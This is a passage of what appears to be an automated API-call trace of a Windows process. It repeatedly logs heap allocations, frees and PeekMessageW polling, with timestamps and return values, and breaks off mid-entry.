0 [0277.649] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x8) returned 0x891978 [0277.649] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x8) returned 0x891b98 [0277.649] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x891b98 | out: hHeap=0x850000) returned 1 [0277.649] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x969d30 [0277.649] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x891978 | out: hHeap=0x850000) returned 1 [0277.649] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x969d30 | out: hHeap=0x850000) returned 1 [0277.649] PeekMessageW (in: lpMsg=0x75f724, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f724) returned 0 [0277.649] PeekMessageW (in: lpMsg=0x75f724, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f724) returned 0 [0277.649] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x8) returned 0x891978 [0277.649] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x8) returned 0x891b98 [0277.649] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x891b98 | out: hHeap=0x850000) returned 1 [0277.649] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x969d30 [0277.649] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x891978 | out: hHeap=0x850000) returned 1 [0277.649] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x969d30 | out: hHeap=0x850000) returned 1 [0277.649] PeekMessageW (in: lpMsg=0x75f724, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f724) returned 0 [0277.649] PeekMessageW (in: lpMsg=0x75f724, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f724) returned 0 [0277.649] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x8) returned 0x891978 [0277.649] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x8) returned 0x891b98 [0277.649] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x891b98 | out: hHeap=0x850000) returned 1 [0277.649] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x969d30 [0277.649] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x891978 | out: hHeap=0x850000) returned 1 [0277.649] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x969d30 | out: hHeap=0x850000) returned 1 [0277.649] PeekMessageW (in: lpMsg=0x75f724, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f724) returned 0 [0277.649] PeekMessageW (in: lpMsg=0x75f724, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f724) returned 0 [0277.649] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x8) returned 0x891978 [0277.649] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x8) returned 0x891b98 [0277.649] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x891b98 | out: hHeap=0x850000) returned 1 [0277.650] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x969d30 [0277.650] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x891978 | out: hHeap=0x850000) returned 1 [0277.650] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x969d30 | out: hHeap=0x850000) returned 1 [0277.650] PeekMessageW (in: lpMsg=0x75f724, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f724) returned 0 [0277.650] PeekMessageW (in: lpMsg=0x75f724, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f724) returned 0 [0277.650] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x8) returned 0x891978 [0277.650] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x8) returned 0x891b98 [0277.650] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x891b98 | out: hHeap=0x850000) returned 1 [0277.650] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x969d30 [0277.650] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x891978 | out: hHeap=0x850000) returned 1 [0277.650] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x969d30 | out: hHeap=0x850000) returned 1 [0277.650] PeekMessageW (in: lpMsg=0x75f724, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f724) returned 0 [0277.650] PeekMessageW (in: lpMsg=0x75f724, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f724) returned 0 [0277.650] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x8) returned 0x891978 [0277.650] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x8) returned 0x891b98 [0277.650] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x891b98 | out: hHeap=0x850000) returned 1 [0277.650] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x969d30 [0277.650] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x891978 | out: hHeap=0x850000) returned 1 [0277.650] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x969d30 | out: hHeap=0x850000) returned 1 [0277.650] PeekMessageW (in: lpMsg=0x75f724, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f724) returned 0 [0277.650] PeekMessageW (in: lpMsg=0x75f724, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f724) returned 0 [0277.650] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x8) returned 0x891978 [0277.650] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x8) returned 0x891b98 [0277.650] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x891b98 | out: hHeap=0x850000) returned 1 [0277.650] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x969d30 [0277.650] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x891978 | out: hHeap=0x850000) returned 1 [0277.650] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x969d30 | out: hHeap=0x850000) returned 1 [0277.650] PeekMessageW (in: lpMsg=0x75f724, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f724) returned 0 [0277.651] PeekMessageW (in: lpMsg=0x75f724, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f724) returned 0 [0277.651] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x8) returned 0x891978 [0277.651] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x8) returned 0x891b98 [0277.651] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x891b98 | out: hHeap=0x850000) returned 1 [0277.651] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x969d30 [0277.651] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x891978 | out: hHeap=0x850000) returned 1 [0277.651] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x969d30 | out: hHeap=0x850000) returned 1 [0277.651] PeekMessageW (in: lpMsg=0x75f724, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f724) returned 0 [0277.651] PeekMessageW (in: lpMsg=0x75f724, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f724) returned 0 [0277.651] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x8) returned 0x891978 [0277.651] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x8) returned 0x891b98 [0277.651] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x891b98 | out: hHeap=0x850000) returned 1 [0277.651] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x969d30 [0277.651] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x891978 | out: hHeap=0x850000) returned 1 [0277.651] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x969d30 | out: hHeap=0x850000) returned 1 [0277.651] PeekMessageW (in: lpMsg=0x75f724, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f724) returned 0 [0277.651] PeekMessageW (in: lpMsg=0x75f724, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f724) returned 0 [0277.651] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x8) returned 0x891978 [0277.651] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x8) returned 0x891b98 [0277.651] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x891b98 | out: hHeap=0x850000) returned 1 [0277.651] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x969d30 [0277.651] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x891978 | out: hHeap=0x850000) returned 1 [0277.651] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x969d30 | out: hHeap=0x850000) returned 1 [0277.651] PeekMessageW (in: lpMsg=0x75f724, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f724) returned 0 [0277.651] PeekMessageW (in: lpMsg=0x75f724, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f724) returned 0 [0277.651] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x8) returned 0x891978 [0277.651] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x8) returned 0x891b98 [0277.651] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x891b98 | out: hHeap=0x850000) returned 1 [0277.651] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x969d30 [0277.652] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x891978 | out: hHeap=0x850000) returned 1 [0277.652] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x969d30 | out: hHeap=0x850000) returned 1 [0277.652] PeekMessageW (in: lpMsg=0x75f724, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f724) returned 0 [0277.652] PeekMessageW (in: lpMsg=0x75f724, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f724) returned 0 [0277.652] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x8) returned 0x891978 [0277.652] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x8) returned 0x891b98 [0277.652] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x891b98 | out: hHeap=0x850000) returned 1 [0277.652] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x969d30 [0277.652] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x891978 | out: hHeap=0x850000) returned 1 [0277.652] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x969d30 | out: hHeap=0x850000) returned 1 [0277.652] PeekMessageW (in: lpMsg=0x75f724, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f724) returned 0 [0277.652] PeekMessageW (in: lpMsg=0x75f724, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f724) returned 0 [0277.652] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x8) returned 0x891978 [0277.652] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x8) returned 0x891b98 [0277.652] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x891b98 | out: hHeap=0x850000) returned 1 [0277.652] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x969d30 [0277.652] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x891978 | out: hHeap=0x850000) returned 1 [0277.652] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x969d30 | out: hHeap=0x850000) returned 1 [0277.652] PeekMessageW (in: lpMsg=0x75f724, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f724) returned 0 [0277.652] PeekMessageW (in: lpMsg=0x75f724, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f724) returned 0 [0277.652] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x8) returned 0x891978 [0277.652] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x8) returned 0x891b98 [0277.652] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x891b98 | out: hHeap=0x850000) returned 1 [0277.652] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x969d30 [0277.652] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x891978 | out: hHeap=0x850000) returned 1 [0277.652] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x969d30 | out: hHeap=0x850000) returned 1 [0277.652] PeekMessageW (in: lpMsg=0x75f724, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f724) returned 0 [0277.652] PeekMessageW (in: lpMsg=0x75f724, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f724) returned 0 [0277.652] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x8) returned 0x891978 [0277.653] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x8) returned 0x891b98 [0277.653] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x891b98 | out: hHeap=0x850000) returned 1 [0277.653] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x969d30 [0277.653] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x891978 | out: hHeap=0x850000) returned 1 [0277.653] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x969d30 | out: hHeap=0x850000) returned 1 [0277.653] PeekMessageW (in: lpMsg=0x75f724, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f724) returned 0 [0277.653] PeekMessageW (in: lpMsg=0x75f724, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f724) returned 0 [0277.653] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x8) returned 0x891978 [0277.653] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x8) returned 0x891b98 [0277.653] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x891b98 | out: hHeap=0x850000) returned 1 [0277.653] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x969d30 [0277.653] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x891978 | out: hHeap=0x850000) returned 1 [0277.653] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x969d30 | out: hHeap=0x850000) returned 1 [0277.653] PeekMessageW (in: lpMsg=0x75f724, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f724) returned 0 [0277.653] PeekMessageW (in: lpMsg=0x75f724, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f724) returned 0 [0277.653] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x8) returned 0x891978 [0277.653] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x8) returned 0x891b98 [0277.653] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x891b98 | out: hHeap=0x850000) returned 1 [0277.653] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x969d30 [0277.653] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x891978 | out: hHeap=0x850000) returned 1 [0277.653] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x969d30 | out: hHeap=0x850000) returned 1 [0277.653] PeekMessageW (in: lpMsg=0x75f724, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f724) returned 0 [0277.653] PeekMessageW (in: lpMsg=0x75f724, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f724) returned 0 [0277.653] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x8) returned 0x891978 [0277.653] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x8) returned 0x891b98 [0277.653] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x891b98 | out: hHeap=0x850000) returned 1 [0277.653] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x969d30 [0277.653] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x891978 | out: hHeap=0x850000) returned 1 [0277.653] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x969d30 | out: hHeap=0x850000) returned 1 [0277.654] PeekMessageW (in: lpMsg=0x75f724, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f724) returned 0 [0277.654] PeekMessageW (in: lpMsg=0x75f724, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f724) returned 0 [0277.654] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x8) returned 0x891978 [0277.654] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x8) returned 0x891b98 [0277.654] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x891b98 | out: hHeap=0x850000) returned 1 [0277.654] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x969d30 [0277.654] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x891978 | out: hHeap=0x850000) returned 1 [0277.654] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x969d30 | out: hHeap=0x850000) returned 1 [0277.654] PeekMessageW (in: lpMsg=0x75f724, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f724) returned 0 [0277.654] PeekMessageW (in: lpMsg=0x75f724, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f724) returned 0 [0277.654] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x8) returned 0x891978 [0277.654] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x8) returned 0x891b98 [0277.654] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x891b98 | out: hHeap=0x850000) returned 1 [0277.654] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x969d30 [0277.654] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x891978 | out: hHeap=0x850000) returned 1 [0277.654] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x969d30 | out: hHeap=0x850000) returned 1 [0277.654] PeekMessageW (in: lpMsg=0x75f724, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f724) returned 0 [0277.654] PeekMessageW (in: lpMsg=0x75f724, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f724) returned 0 [0277.654] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x8) returned 0x891978 [0277.654] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x8) returned 0x891b98 [0277.654] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x891b98 | out: hHeap=0x850000) returned 1 [0277.654] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x969d30 [0277.654] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x891978 | out: hHeap=0x850000) returned 1 [0277.654] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x969d30 | out: hHeap=0x850000) returned 1 [0277.654] PeekMessageW (in: lpMsg=0x75f724, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f724) returned 0 [0277.654] PeekMessageW (in: lpMsg=0x75f724, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f724) returned 0 [0277.654] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x8) returned 0x891978 [0277.654] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x8) returned 0x891b98 [0277.655] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x891b98 | out: hHeap=0x850000) returned 1 [0277.655] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x969d30 [0277.655] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x891978 | out: hHeap=0x850000) returned 1 [0277.655] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x969d30 | out: hHeap=0x850000) returned 1 [0277.655] PeekMessageW (in: lpMsg=0x75f724, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f724) returned 0 [0277.655] PeekMessageW (in: lpMsg=0x75f724, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f724) returned 0 [0277.655] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x8) returned 0x891978 [0277.655] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x8) returned 0x891b98 [0277.655] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x891b98 | out: hHeap=0x850000) returned 1 [0277.655] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x969d30 [0277.655] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x891978 | out: hHeap=0x850000) returned 1 [0277.655] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x969d30 | out: hHeap=0x850000) returned 1 [0277.655] PeekMessageW (in: lpMsg=0x75f724, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f724) returned 0 [0277.655] PeekMessageW (in: lpMsg=0x75f724, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f724) returned 0 [0277.655] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x8) returned 0x891978 [0277.655] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x8) returned 0x891b98 [0277.655] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x891b98 | out: hHeap=0x850000) returned 1 [0277.655] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x969d30 [0277.655] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x891978 | out: hHeap=0x850000) returned 1 [0277.655] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x969d30 | out: hHeap=0x850000) returned 1 [0277.655] PeekMessageW (in: lpMsg=0x75f724, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f724) returned 0 [0277.655] PeekMessageW (in: lpMsg=0x75f724, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f724) returned 0 [0277.655] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x8) returned 0x891978 [0277.655] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x8) returned 0x891b98 [0277.655] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x891b98 | out: hHeap=0x850000) returned 1 [0277.655] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x969d30 [0277.655] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x891978 | out: hHeap=0x850000) returned 1 [0277.655] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x969d30 | out: hHeap=0x850000) returned 1 [0277.655] PeekMessageW (in: lpMsg=0x75f724, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f724) returned 0 [0277.656] PeekMessageW (in: lpMsg=0x75f724, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f724) returned 0 [0277.656] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x8) returned 0x891978 [0277.656] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x8) returned 0x891b98 [0277.656] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x891b98 | out: hHeap=0x850000) returned 1 [0277.656] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x969d30 [0277.656] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x891978 | out: hHeap=0x850000) returned 1 [0277.656] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x969d30 | out: hHeap=0x850000) returned 1 [0277.656] PeekMessageW (in: lpMsg=0x75f724, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f724) returned 0 [0277.656] PeekMessageW (in: lpMsg=0x75f724, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f724) returned 0 [0277.656] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x8) returned 0x891978 [0277.656] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x8) returned 0x891b98 [0277.656] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x891b98 | out: hHeap=0x850000) returned 1 [0277.656] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x969d30 [0277.656] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x891978 | out: hHeap=0x850000) returned 1 [0277.656] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x969d30 | out: hHeap=0x850000) returned 1 [0277.656] PeekMessageW (in: lpMsg=0x75f724, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f724) returned 0 [0277.656] PeekMessageW (in: lpMsg=0x75f724, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f724) returned 0 [0277.656] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x8) returned 0x891978 [0277.656] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x8) returned 0x891b98 [0277.656] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x891b98 | out: hHeap=0x850000) returned 1 [0277.656] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x969d30 [0277.656] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x891978 | out: hHeap=0x850000) returned 1 [0277.656] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x969d30 | out: hHeap=0x850000) returned 1 [0277.656] PeekMessageW (in: 